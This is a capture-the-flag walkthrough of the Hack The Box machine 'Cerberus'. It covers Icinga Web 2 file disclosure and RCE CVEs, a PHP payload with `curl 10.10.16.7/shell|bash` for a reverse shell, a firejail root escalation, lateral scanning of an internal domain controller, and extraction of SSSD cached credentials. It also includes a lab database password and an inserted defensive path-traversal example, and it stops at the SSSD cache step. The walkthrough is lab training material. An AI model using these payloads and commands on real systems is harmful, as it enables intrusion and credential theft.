HTB | Cerberus

Machine - https://app.hackthebox.com/machines/Cerberus

IP - 10.10.11.205

NMAP

└─$ nmap -sC -sV -p 8080 10.10.11.205 -Pn -oA nmap_port_details                                                                 
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-08-13 12:31 IST
Nmap scan report for 10.10.11.205
Host is up (0.30s latency).

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Did not follow redirect to <http://icinga.cerberus.local:8080/icingaweb2>
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.52 (Ubuntu)

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 22.58 seconds

Port 8080

Nmap shows the site redirecting to http://icinga.cerberus.local:8080/icingaweb2, so the hostname has to go into /etc/hosts before fuzzing. dirsearch found nothing on the web root:

└─$ dirsearch -u http://icinga.cerberus.local:8080/ -x 403,404 
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See <https://setuptools.pypa.io/en/latest/pkg_resources.html>
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                                                                                                                                             
 (_||| _) (/_(_|| (_| )                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                             
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/anurag/htb/Cerberus/reports/http_icinga.cerberus.local_8080/__25-08-13_12-49-16.txt

Target: <http://icinga.cerberus.local:8080/>

[12:49:16] Starting:                                                                                                                                                                                                                                                         
                                                                             
Task Completed   

But fuzzing /icingaweb2 returned a lot of 302s: every path redirects to the login page, which is how Icinga Web 2 treats unauthenticated requests, so these hits are not individually interesting.

└─$ dirsearch -u http://icinga.cerberus.local:8080/icingaweb2/ -x 403,404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See <https://setuptools.pypa.io/en/latest/pkg_resources.html>
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                                                                                                                                              
 (_||| _) (/_(_|| (_| )                                                                                                                                                                                                                                                       
                                                                                                                                                                                                                                                                              
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/anurag/htb/Cerberus/reports/http_icinga.cerberus.local_8080/_icingaweb2__25-08-13_12-54-20.txt

Target: <http://icinga.cerberus.local:8080/>

[12:54:20] Starting: icingaweb2/                                                                                                                                                                                                                                              
[12:54:37] 301 -  345B  - /icingaweb2/js  ->  <http://icinga.cerberus.local:8080/icingaweb2/js/>
[12:55:04] 302 -    0B  - /icingaweb2/0  ->  /icingaweb2/authentication/login
[12:55:14] 302 -    0B  - /icingaweb2/About  ->  /icingaweb2/authentication/login?redirect=About
[12:55:14] 302 -    0B  - /icingaweb2/about  ->  /icingaweb2/authentication/login?redirect=about
[12:55:16] 302 -    0B  - /icingaweb2/account/login.aspx  ->  /icingaweb2/authentication/login?redirect=account%2Flogin.aspx
[12:55:16] 302 -    0B  - /icingaweb2/account/login  ->  /icingaweb2/authentication/login?redirect=account%2Flogin
[12:55:16] 302 -    0B  - /icingaweb2/account/  ->  /icingaweb2/authentication/login?redirect=account%2F
[12:55:16] 302 -    0B  - /icingaweb2/account  ->  /icingaweb2/authentication/login?redirect=account
[12:55:16] 302 -    0B  - /icingaweb2/account/login.php  ->  /icingaweb2/authentication/login?redirect=account%2Flogin.php
[12:55:16] 302 -    0B  - /icingaweb2/account/login.jsp  ->  /icingaweb2/authentication/login?redirect=account%2Flogin.jsp
[12:55:16] 302 -    0B  - /icingaweb2/account/login.html  ->  /icingaweb2/authentication/login?redirect=account%2Flogin.html
[12:55:16] 302 -    0B  - /icingaweb2/account/login.js  ->  /icingaweb2/authentication/login?redirect=account%2Flogin.js
[12:55:16] 302 -    0B  - /icingaweb2/account/login.rb  ->  /icingaweb2/authentication/login?redirect=account%2Flogin.rb
[12:55:16] 302 -    0B  - /icingaweb2/account/login.py  ->  /icingaweb2/authentication/login?redirect=account%2Flogin.py
[12:55:16] 302 -    0B  - /icingaweb2/account/login.shtml  ->  /icingaweb2/authentication/login?redirect=account%2Flogin.shtml
[12:55:16] 302 -    0B  - /icingaweb2/account/logon  ->  /icingaweb2/authentication/login?redirect=account%2Flogon
[12:55:16] 302 -    0B  - /icingaweb2/account/login.htm  ->  /icingaweb2/authentication/login?redirect=account%2Flogin.htm
[12:55:16] 302 -    0B  - /icingaweb2/account/signin  ->  /icingaweb2/authentication/login?redirect=account%2Fsignin
[12:56:12] 302 -    0B  - /icingaweb2/config  ->  /icingaweb2/authentication/login?redirect=config
[12:56:13] 302 -    0B  - /icingaweb2/config/app.yml  ->  /icingaweb2/authentication/login?redirect=config%2Fapp.yml
[12:56:13] 302 -    0B  - /icingaweb2/config/banned_words.txt  ->  /icingaweb2/authentication/login?redirect=config%2Fbanned_words.txt
[12:56:13] 302 -    0B  - /icingaweb2/config/autoload/  ->  /icingaweb2/authentication/login?redirect=config%2Fautoload%2F
[12:56:13] 302 -    0B  - /icingaweb2/config/apc.php  ->  /icingaweb2/authentication/login?redirect=config%2Fapc.php
[12:56:13] 302 -    0B  - /icingaweb2/config/app.php  ->  /icingaweb2/authentication/login?redirect=config%2Fapp.php
[12:56:13] 302 -    0B  - /icingaweb2/Config/  ->  /icingaweb2/authentication/login?redirect=Config%2F
[12:56:13] 302 -    0B  - /icingaweb2/config/AppData.config  ->  /icingaweb2/authentication/login?redirect=config%2FAppData.config
[12:56:13] 302 -    0B  - /icingaweb2/config/  ->  /icingaweb2/authentication/login?redirect=config%2F
[12:56:13] 302 -    0B  - /icingaweb2/config/config.inc  ->  /icingaweb2/authentication/login?redirect=config%2Fconfig.inc
[12:56:13] 302 -    0B  - /icingaweb2/config/aws.yml  ->  /icingaweb2/authentication/login?redirect=config%2Faws.yml
[12:56:13] 302 -    0B  - /icingaweb2/config/config.ini  ->  /icingaweb2/authentication/login?redirect=config%2Fconfig.ini
[12:56:13] 302 -    0B  - /icingaweb2/config/database.yml  ->  /icingaweb2/authentication/login?redirect=config%2Fdatabase.yml
[12:56:13] 302 -    0B  - /icingaweb2/config/database.yml.pgsql  ->  /icingaweb2/authentication/login?redirect=config%2Fdatabase.yml.pgsql
[12:56:13] 302 -    0B  - /icingaweb2/config/database.yml.sqlite3  ->  /icingaweb2/authentication/login?redirect=config%2Fdatabase.yml.sqlite3
[12:56:13] 302 -    0B  - /icingaweb2/config/database.yml~  ->  /icingaweb2/authentication/login?redirect=config%2Fdatabase.yml~
[12:56:13] 302 -    0B  - /icingaweb2/config/databases.yml  ->  /icingaweb2/authentication/login?redirect=config%2Fdatabases.yml
[12:56:13] 302 -    0B  - /icingaweb2/config/db.inc  ->  /icingaweb2/authentication/login?redirect=config%2Fdb.inc
[12:56:13] 302 -    0B  - /icingaweb2/config/development/  ->  /icingaweb2/authentication/login?redirect=config%2Fdevelopment%2F
[12:56:13] 302 -    0B  - /icingaweb2/config/master.key  ->  /icingaweb2/authentication/login?redirect=config%2Fmaster.key
[12:56:13] 302 -    0B  - /icingaweb2/config/settings/production.yml  ->  /icingaweb2/authentication/login?redirect=config%2Fsettings%2Fproduction.yml
[12:56:13] 302 -    0B  - /icingaweb2/config/producao.ini  ->  /icingaweb2/authentication/login?redirect=config%2Fproducao.ini
[12:56:13] 302 -    0B  - /icingaweb2/config/site.php  ->  /icingaweb2/authentication/login?redirect=config%2Fsite.php
[12:56:13] 302 -    0B  - /icingaweb2/config/settings.local.yml  ->  /icingaweb2/authentication/login?redirect=config%2Fsettings.local.yml
[12:56:13] 302 -    0B  - /icingaweb2/config/settings.inc  ->  /icingaweb2/authentication/login?redirect=config%2Fsettings.inc
[12:56:13] 302 -    0B  - /icingaweb2/config/monkcheckout.ini  ->  /icingaweb2/authentication/login?redirect=config%2Fmonkcheckout.ini
[12:56:13] 302 -    0B  - /icingaweb2/config/settings.ini.cfm  ->  /icingaweb2/authentication/login?redirect=config%2Fsettings.ini.cfm
[12:56:13] 302 -    0B  - /icingaweb2/config/initializers/secret_token.rb  ->  /icingaweb2/authentication/login?redirect=config%2Finitializers%2Fsecret_token.rb
[12:56:13] 302 -    0B  - /icingaweb2/config/settings.ini  ->  /icingaweb2/authentication/login?redirect=config%2Fsettings.ini
[12:56:13] 302 -    0B  - /icingaweb2/config/xml/  ->  /icingaweb2/authentication/login?redirect=config%2Fxml%2F
[12:56:13] 302 -    0B  - /icingaweb2/config/monkid.ini  ->  /icingaweb2/authentication/login?redirect=config%2Fmonkid.ini
[12:56:13] 302 -    0B  - /icingaweb2/config/monkdonate.ini  ->  /icingaweb2/authentication/login?redirect=config%2Fmonkdonate.ini
[12:56:14] 302 -    0B  - /icingaweb2/config/routes.yml  ->  /icingaweb2/authentication/login?redirect=config%2Froutes.yml
[12:56:17] 301 -  346B  - /icingaweb2/css  ->  <http://icinga.cerberus.local:8080/icingaweb2/css/>
[12:56:18] 302 -    0B  - /icingaweb2/dashboard  ->  /icingaweb2/authentication/login?redirect=dashboard
[12:56:18] 302 -    0B  - /icingaweb2/dashboard/  ->  /icingaweb2/authentication/login?redirect=dashboard%2F
[12:56:18] 302 -    0B  - /icingaweb2/dashboard/faq.html  ->  /icingaweb2/authentication/login?redirect=dashboard%2Ffaq.html
[12:56:18] 302 -    0B  - /icingaweb2/dashboard/howto.html  ->  /icingaweb2/authentication/login?redirect=dashboard%2Fhowto.html
[12:56:18] 302 -    0B  - /icingaweb2/dashboard/phpinfo.php  ->  /icingaweb2/authentication/login?redirect=dashboard%2Fphpinfo.php
[12:56:20] 302 -    0B  - /icingaweb2/default  ->  /icingaweb2/authentication/login?redirect=default
[12:56:36] 302 -    0B  - /icingaweb2/group  ->  /icingaweb2/authentication/login?redirect=group
[12:56:38] 302 -    0B  - /icingaweb2/health  ->  /icingaweb2/authentication/login?redirect=health
[12:56:41] 301 -  346B  - /icingaweb2/img  ->  <http://icinga.cerberus.local:8080/icingaweb2/img/>
[12:56:42] 302 -    0B  - /icingaweb2/index  ->  /icingaweb2/authentication/login?redirect=index
[12:56:42] 200 -    0B  - /icingaweb2/index.php                             
[12:56:50] 302 -    0B  - /icingaweb2/list  ->  /icingaweb2/authentication/login?redirect=list
[12:57:32] 302 -    0B  - /icingaweb2/Search  ->  /icingaweb2/authentication/login?redirect=Search
[12:57:32] 302 -    0B  - /icingaweb2/search  ->  /icingaweb2/authentication/login?redirect=search
[12:57:53] 302 -    0B  - /icingaweb2/user/  ->  /icingaweb2/authentication/login?redirect=user%2F
[12:57:53] 302 -    0B  - /icingaweb2/user  ->  /icingaweb2/authentication/login?redirect=user
[12:57:53] 302 -    0B  - /icingaweb2/user/0  ->  /icingaweb2/authentication/login?redirect=user%2F0
[12:57:53] 302 -    0B  - /icingaweb2/user/1  ->  /icingaweb2/authentication/login?redirect=user%2F1
[12:57:53] 302 -    0B  - /icingaweb2/user/2  ->  /icingaweb2/authentication/login?redirect=user%2F2
[12:57:53] 302 -    0B  - /icingaweb2/user/3  ->  /icingaweb2/authentication/login?redirect=user%2F3
[12:57:53] 302 -    0B  - /icingaweb2/user/admin  ->  /icingaweb2/authentication/login?redirect=user%2Fadmin
[12:57:54] 302 -    0B  - /icingaweb2/user/login.php  ->  /icingaweb2/authentication/login?redirect=user%2Flogin.php
[12:57:54] 302 -    0B  - /icingaweb2/user/login.aspx  ->  /icingaweb2/authentication/login?redirect=user%2Flogin.aspx
[12:57:54] 302 -    0B  - /icingaweb2/user/admin.php  ->  /icingaweb2/authentication/login?redirect=user%2Fadmin.php
[12:57:54] 302 -    0B  - /icingaweb2/user/login.jsp  ->  /icingaweb2/authentication/login?redirect=user%2Flogin.jsp
[12:57:54] 302 -    0B  - /icingaweb2/user/login.js  ->  /icingaweb2/authentication/login?redirect=user%2Flogin.js
[12:57:54] 302 -    0B  - /icingaweb2/user/login/  ->  /icingaweb2/authentication/login?redirect=user%2Flogin%2F
[12:57:54] 302 -    0B  - /icingaweb2/user/login.html  ->  /icingaweb2/authentication/login?redirect=user%2Flogin.html
[12:57:54] 302 -    0B  - /icingaweb2/user/signup  ->  /icingaweb2/authentication/login?redirect=user%2Fsignup
                                                                             
Task Completed  

Foothold/shell

Shell as www-data on icinga

Arbitrary File Disclosure (CVE-2022-24716)

Looking for known vulnerabilities in Icinga Web 2 with searchsploit, we found an arbitrary file disclosure (CVE-2022-24716) and an authenticated RCE (CVE-2022-24715):

┌──(anurag㉿anurag)-[~/htb/Cerberus]
└─$ searchsploit icinga                             
--------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                          |  Path
--------------------------------------------------------------------------------------- ---------------------------------
Icinga - cgi/config.c process_cgivars Function Off-by-One Read Remote Denial of Service | cgi/dos/38882.txt
Icinga Web 2.10 - Arbitrary File Disclosure                                             | php/webapps/51329.py
Icinga Web 2.10 - Authenticated Remote Code Execution                                   | php/webapps/51586.py
--------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

But that RCE requires a valid username and password, which we do not have yet:

└─$ python3 51586.py    
usage: 51586.py [-h] -u URL -U USER -P PASSWORD -i IP -p PORT
51586.py: error: the following arguments are required: -u/--url, -U/--user, -P/--password, -i/--ip, -p/--port

The arbitrary file disclosure, however, works without authentication:

└─$ python3 51329.py http://icinga.cerberus.local:8080/icingaweb2/ '/etc/passwd'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
matthew:x:1000:1000:matthew:/home/matthew:/bin/bash
ntp:x:108:113::/nonexistent:/usr/sbin/nologin
sssd:x:109:115:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
nagios:x:110:118::/var/lib/nagios:/usr/sbin/nologin
redis:x:111:119::/var/lib/redis:/usr/sbin/nologin
mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false
icingadb:x:999:999::/etc/icingadb:/sbin/nologin

The disclosure is read-only; we cannot upload files through it, so I started looking around for useful files:

└─$ python3 51329.py http://icinga.cerberus.local:8080/icingaweb2/ '/etc/hosts'                                   
127.0.0.1 iceinga.cerberus.local iceinga
127.0.1.1 localhost
172.16.22.1 DC.cerberus.local DC cerberus.local

# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

Here 172.16.22.1 resolves to DC.cerberus.local. That is a private address on a different subnet from the 10.10.11.205 we reached, so the domain controller is probably internal (a separate VM or container), and we will likely need to pivot to reach it.

Getting matthew's credentials via the Icinga Web docs

Since we cannot do anything with the login form yet, let's read the configuration files, whose locations are documented in the Icinga Web 2 documentation (reference - Icinga Web Doc). config.ini first:

└─$ python3 51329.py http://icinga.cerberus.local:8080/icingaweb2/ '/etc/icingaweb2/config.ini'
[global]
show_stacktraces = "1"
show_application_state_messages = "1"
config_backend = "db"
config_resource = "icingaweb2"
module_path = "/usr/share/icingaweb2/modules/"

[logging]
log = "syslog"
level = "ERROR"
application = "icingaweb2"
facility = "user"

[themes]

[authentication]

config_backend = "db" with config_resource = "icingaweb2" means user preferences are stored in a database resource named icingaweb2, and resources are defined in resources.ini. That file holds the database credentials for matthew:

└─$ python3 51329.py http://icinga.cerberus.local:8080/icingaweb2/ '/etc/icingaweb2/resources.ini'
[icingaweb2]
type = "db"
db = "mysql"
host = "localhost"
dbname = "icingaweb2"
username = "matthew"
password = "IcingaWebPassword2023"
use_ssl = "0"

The database password is reused for the web UI, so matthew / IcingaWebPassword2023 logs us in to Icinga Web 2.

CVE-2022-24715

Public POCs did not work for me

Refer - https://www.sonarsource.com/blog/path-traversal-vulnerabilities-in-icinga-web/#remote-code-execution-cve202224715

Since no public PoC worked, we go for the manual method from the article: the SSH Identity resource form writes the supplied private key to a file whose name is taken from the user field without a traversal check, so the key can be written to an arbitrary path. The content still has to pass the form's private-key validation, so first we need a key in PEM format:

└─$ ssh-keygen -m pem -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/home/anurag/.ssh/id_rsa): tempkey
Enter passphrase for "tempkey" (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in tempkey
Your public key has been saved in tempkey.pub
The key fingerprint is:
SHA256:4J9lWRD1jRqhq66XUu4KJIrz4A/gVb2oxVIgRxq2knQ anurag@anurag
The key's randomart image is:
+---[RSA 3072]----+
| =.E      ooo    |
|o.B . .    o o o |
|oo   o..  . o o .|
|.   +....  + o   |
|. .o.+..S = .    |
|+..o+  ..=       |
|=o ..  o+.       |
|.+.  ...+        |
| .o.  o*o        |
+----[SHA256]-----+
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Cerberus]
└─$ cat tempkey
-----BEGIN RSA PRIVATE KEY-----
<private key body omitted>
-----END RSA PRIVATE KEY-----

Now, logged in as matthew, we go to Configuration -> Application -> Resources and create a new resource of type SSH Identity.

We put the private key in the key field and a traversal path in the user field (it names the file, so the key lands in /dev/shm/anurag.txt instead of under /etc/icingaweb2/ssh), then save.

We can validate the write via the file disclosure:

└─$ python3 51329.py http://icinga.cerberus.local:8080/icingaweb2/ '/dev/shm/anurag.txt'                                                                  
-----BEGIN RSA PRIVATE KEY-----
<private key body omitted>
-----END RSA PRIVATE KEY-----

Now let's try to get a shell.

For that we need a way to run PHP or bash, but since the form only accepts SSH keys, that will not be easy.

But following the Sonar article, we can put a null byte in the content and trick the validation, so PHP ends up in the written file ahead of the key:

└─$ python3 51329.py http://icinga.cerberus.local:8080/icingaweb2/ '/dev/shm/anurag4.txt'
<?php system("id");?>
-----BEGIN RSA PRIVATE KEY-----
<private key body omitted>
-----END RSA PRIVATE KEY-----
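The two Icinga Web 2 bugs used above share one root cause: a user-controlled path segment is joined onto a base directory without checking where the result lands, once on the read side (the static-file handler behind CVE-2022-24716) and once on the write side (the SSH Identity resource's user field behind CVE-2022-24715). The following Python is an added example, not Icinga's code and not the exploit scripts; the directory layout, file names and user names in it are constructed, and `naive_join` is only a stand-in for the vulnerable shape, shown next to the contained version a fix would use:

```python
import os
import tempfile


def naive_join(base: str, user_path: str) -> str:
    """Vulnerable pattern: glue a user-controlled segment onto a base directory.

    os.path.join discards `base` entirely when `user_path` is absolute, and
    "../" segments walk out of `base`; nothing checks where the result lands.
    """
    return os.path.normpath(os.path.join(base, user_path))


def contained_join(base: str, user_path: str) -> str:
    """Hardened pattern: resolve the candidate (symlinks included) and insist
    that it still lives under the resolved base directory."""
    base_real = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(base_real, user_path))
    if candidate != base_real and not candidate.startswith(base_real + os.sep):
        raise ValueError(f"{user_path!r} escapes {base_real}")
    return candidate


def serve_static(lib_dir: str, user_path: str) -> bytes:
    """Read side, the shape of CVE-2022-24716: serve a file under a library dir."""
    with open(contained_join(lib_dir, user_path), "rb") as fh:
        return fh.read()


def store_private_key(ssh_dir: str, user: str, key_pem: bytes) -> str:
    """Write side, the shape of CVE-2022-24715: the resource's user field names
    the file the key is stored in. Reject separators and dot-names outright,
    then still check containment before writing."""
    if not user or user.startswith(".") or any(c in user for c in "/\\\0"):
        raise ValueError(f"invalid user name {user!r}")
    target = contained_join(ssh_dir, user)
    os.makedirs(ssh_dir, mode=0o700, exist_ok=True)
    with open(target, "wb") as fh:
        fh.write(key_pem)
    os.chmod(target, 0o600)
    return target


def demo() -> dict:
    """Constructed layout: a library dir with one public file and a 'secret'
    one level up standing in for /etc/passwd. Returns which checks held."""
    root = tempfile.mkdtemp()
    lib = os.path.join(root, "lib")
    os.makedirs(lib)
    with open(os.path.join(lib, "style.css"), "w") as fh:
        fh.write("body{}")
    with open(os.path.join(root, "secret"), "w") as fh:
        fh.write("root:x:0:0:")
    ssh_dir = os.path.join(root, "ssh")

    def blocked(fn, *args) -> bool:
        try:
            fn(*args)
        except ValueError:
            return True
        return False

    return {
        # The naive join happily produces paths outside the base.
        "naive_relative_escapes": naive_join(lib, "../secret") == os.path.join(root, "secret"),
        "naive_absolute_escapes": naive_join(lib, "/etc/passwd") == "/etc/passwd",
        # The contained join serves the legitimate file and rejects both escapes.
        "legit_read": serve_static(lib, "style.css") == b"body{}",
        "relative_read_blocked": blocked(serve_static, lib, "../secret"),
        "absolute_read_blocked": blocked(serve_static, lib, "/etc/passwd"),
        # The key writer keeps traversal names out of the key directory.
        "legit_write": store_private_key(ssh_dir, "matthew", b"KEY").startswith(os.path.realpath(ssh_dir)),
        "traversal_write_blocked": blocked(store_private_key, ssh_dir, "../../dev/shm/x.txt", b"KEY"),
    }


if __name__ == "__main__":
    for check, held in demo().items():
        print(f"{check}: {held}")
```

The containment check compares resolved paths rather than the raw string, so a symlink inside the base directory pointing outside it is also rejected; the write side additionally refuses separators so that a resource name can never create subdirectories under the key store even when it would not escape it.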

Now let's try to run a PHP command.

(I was not able to make it work; shoutout to 0xdf and ippsec, because of their writeups I was able to make it work.)

For that, we will use configuration.php: Icinga Web 2 loads <module path>/<module name>/configuration.php for each module directory under the configured module path when that module is enabled, so a PHP file written there runs as www-data. The payload this time is a ping back to our box, with the PEM block wrapped in a PHP comment so the file still validates as a key:

<?php

system("ping -c 1 10.10.16.7");

/*
-----BEGIN RSA PRIVATE KEY-----
<private key body omitted>
-----END RSA PRIVATE KEY-----
*/

And then we change the module path (Configuration -> Application -> General, Module Path) to the directory we are writing our module into.

Then when we open the module list and click on the test module we created, the ping arrives on our box, confirming code execution.

Now it's time to get a reverse shell:

<?php

system("curl 10.10.16.7/shell|bash");

/*
-----BEGIN RSA PRIVATE KEY-----
<private key body omitted>
-----END RSA PRIVATE KEY-----
*/

And when we click on module test2 we get the shell:

└─$ python3 -m http.server 80                                                            
Serving HTTP on 0.0.0.0 port 80 (<http://0.0.0.0:80/>) ...
10.10.11.205 - - [13/Aug/2025 17:04:33] "GET /shell HTTP/1.1" 200 -

└─$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.205] 49804
bash: cannot set terminal process group (611): Inappropriate ioctl for device
bash: no job control in this shell
www-data@icinga:/usr/share/icingaweb2/public$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data),121(icingaweb2) 

Shell as root on Icinga

Looking for SUID binaries, we found something interesting: firejail.

www-data@icinga:/home$ find / -perm /4000 -exec ls -l {} \; 2>/dev/null
-rwsr-xr-x 1 root root 14488 Feb  4  2021 /usr/sbin/ccreds_chkpwd
-rwsr-xr-x 1 root root 47480 Feb 21  2022 /usr/bin/mount
-rwsr-xr-x 1 root root 232408 Feb 14  2022 /usr/bin/sudo
-rwsr-xr-x 1 root root 474496 Jan 19  2022 /usr/bin/firejail
-rwsr-xr-x 1 root root 72712 Mar 14  2022 /usr/bin/chfn
-rwsr-xr-x 1 root root 35200 Mar 23  2022 /usr/bin/fusermount3
-rwsr-xr-x 1 root root 40496 Mar 14  2022 /usr/bin/newgrp
-rwsr-xr-x 1 root root 59976 Mar 14  2022 /usr/bin/passwd
-rwsr-xr-x 1 root root 72072 Mar 14  2022 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 47400 Feb 21  2022 /usr/bin/ksu
-rwsr-xr-x 1 root root 30872 Feb 26  2022 /usr/bin/pkexec
-rwsr-xr-x 1 root root 44808 Mar 14  2022 /usr/bin/chsh
-rwsr-xr-x 1 root root 55672 Feb 21  2022 /usr/bin/su
-rwsr-xr-x 1 root root 35192 Feb 21  2022 /usr/bin/umount
-rwsr-xr-- 1 root messagebus 35112 Apr  1  2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 338536 Nov 23  2022 /usr/lib/openssh/ssh-keysign

Firejail escape

Looking for vulnerabilities in firejail, we found the "Firejoin" local privilege escalation (CVE-2022-31214): firejail --join runs with root privileges and decides whether the target PID is a real sandbox from state that an unprivileged user can forge inside their own user and mount namespaces, so a shell joined to the fake sandbox ends up in an attacker-controlled mount namespace while setuid binaries keep working. The public PoC sets that up and waits:

www-data@icinga:/tmp$ python3 firejail.py 
You can now run 'firejail --join=3244' in another terminal to obtain a shell where 'sudo su -' should grant you a root shell.

Now we need a second shell on the box to run the join (the PID differs between runs). sudo fails as expected for www-data, but su - with no password drops us to root:

www-data@icinga:/tmp$ firejail --join=3270
changing root to /proc/3270/root
Warning: cleaning all supplementary groups
Child process initialized in 15.57 ms
www-data@icinga:/tmp$ sudo su -
www-data is not in the sudoers file.  This incident will be reported.
www-data@icinga:/tmp$ su -
root@icinga:~# 

Shell as Matthew on Cerberus

We saw the internal IP for the DC in /etc/hosts. We can confirm it with a simple ping sweep; 172.16.22.2 is icinga itself, and the TTL of 128 from .1 is typical of a Windows host:

for i in {1..255}; do (ping -c 1 172.16.22.${i} | grep "bytes from" &); done
64 bytes from 172.16.22.1: icmp_seq=1 ttl=128 time=0.595 ms
64 bytes from 172.16.22.2: icmp_seq=1 ttl=64 time=0.015 ms
ping: Do you want to ping broadcast? Then -b. If not, check your local firewall rules
root@icinga:~/cleanup# 

Let's copy a static nmap binary to the box (as np) and run it against the DC:

root@icinga:/tmp# ./np -p- --min-rate 10000 172.16.22.1

Starting Nmap 6.49BETA1 ( <http://nmap.org> ) at 2025-08-13 14:07 UTC
Unable to find nmap-services!  Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for DC.cerberus.local (172.16.22.1)
Cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performed
Host is up (0.00067s latency).
Not shown: 65534 filtered ports
PORT     STATE SERVICE
5985/tcp open  unknown
MAC Address: 00:15:5D:5F:E8:00 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 13.50 seconds
root@icinga:/tmp# 

Sweet, WinRM (5985/tcp) is open and everything else is filtered.

sssd

root@icinga:/tmp# ps -ef --forest
UID          PID    PPID  C STIME TTY          TIME CMD
root        1101       1  0 09:45 tty1     00:00:00 /sbin/agetty -o -p -- \u --n
root        1065       1  0 09:45 ?        00:00:00 /lib/systemd/systemd-logind
root        1063       1  0 09:45 ?        00:00:00 /usr/sbin/cron -f -P
<--SNIP-->
<--SNIP-->
www-data     948     611  0 09:45 ?        00:00:00  \_ php-fpm: pool www
root         560       1  0 09:45 ?        00:00:00 /usr/sbin/sssd -i --logger=f
root         794     560  0 09:45 ?        00:00:00  \_ /usr/libexec/sssd/sssd_b
root         899     560  0 09:45 ?        00:00:00  \_ /usr/libexec/sssd/sssd_n
root         901     560  0 09:45 ?        00:00:00  \_ /usr/libexec/sssd/sssd_p
root         558       1  0 09:45 ?        00:00:00 /usr/bin/python3 /usr/bin/ne
<--SNIP-->
<--SNIP-->

SSSD (System Security Services Daemon) provides a set of daemons to manage access to remote directory services and authentication mechanisms; here it joins the Linux box to the cerberus.local domain, and it caches domain credentials locally so that users can still log in when the DC is unreachable.

There are a few files in /var/lib/sss/db. Running strings on cache_cerberus.local.ldb returns a lot of data, including the matthew user and his cached password hash:

root@icinga:/tmp# ls -la /var/lib/sss/
total 40
drwxr-xr-x 10 root root 4096 Jan 22  2023 .
drwxr-xr-x 38 root root 4096 Jan 29  2023 ..
drwx------  2 root root 4096 Mar  2  2023 db
drwxr-x--x  2 root root 4096 Oct  4  2022 deskprofile
drwxr-xr-x  2 root root 4096 Oct  4  2022 gpo_cache
drwx------  2 root root 4096 Oct  4  2022 keytabs
drwxrwxr-x  2 root root 4096 Aug 13 09:45 mc
drwxr-xr-x  3 root root 4096 Aug 13 09:45 pipes
drwxr-xr-x  3 root root 4096 Aug 13 13:51 pubconf
drwx------  2 root root 4096 Jan 22  2023 secrets
root@icinga:/tmp# strings /var/lib/sss/db/
cache_cerberus.local.ldb       sssd.ldb
ccache_CERBERUS.LOCAL          timestamps_cerberus.local.ldb
config.ldb 

root@icinga:/tmp# strings /var/lib/sss/db/cache_cerberus.local.ldb  
<--SNIP-->
<--SNIP-->
name
matthew@cerberus.local
objectCategory
user
uidNumber
1000
isPosix
TRUE
lastUpdate
1677672476
dataExpireTimestamp
initgrExpireTimestamp
cachedPassword
